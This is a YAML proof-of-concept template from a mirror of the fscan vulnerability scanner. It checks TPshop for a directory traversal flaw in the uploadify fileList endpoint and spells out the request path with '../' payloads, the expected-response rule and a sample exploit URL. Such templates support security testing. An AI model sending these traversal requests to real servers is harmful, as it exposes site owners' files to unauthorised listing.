mirror of https://github.com/qwqdanchun/fscan.git
18 lines
627 B
YAML
18 lines
627 B
YAML
name: poc-yaml-tpshop-directory-traversal
|
|
rules:
|
|
- method: GET
|
|
path: /index.php/Home/uploadify/fileList?type=.+&path=../
|
|
headers:
|
|
Accept-Encoding: 'deflate'
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(string("\"state\":\"SUCCESS\""))) && response.body.bcontains(bytes(string("total")))
|
|
detail:
|
|
author: 清风明月(www.secbook.info)
|
|
influence_version: 'TPshop'
|
|
links:
|
|
- https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
|
|
- http://www.tp-shop.cn
|
|
exploit:
|
|
- https://localhost/index.php/Home/uploadify/fileList?type=.+&path=../../
|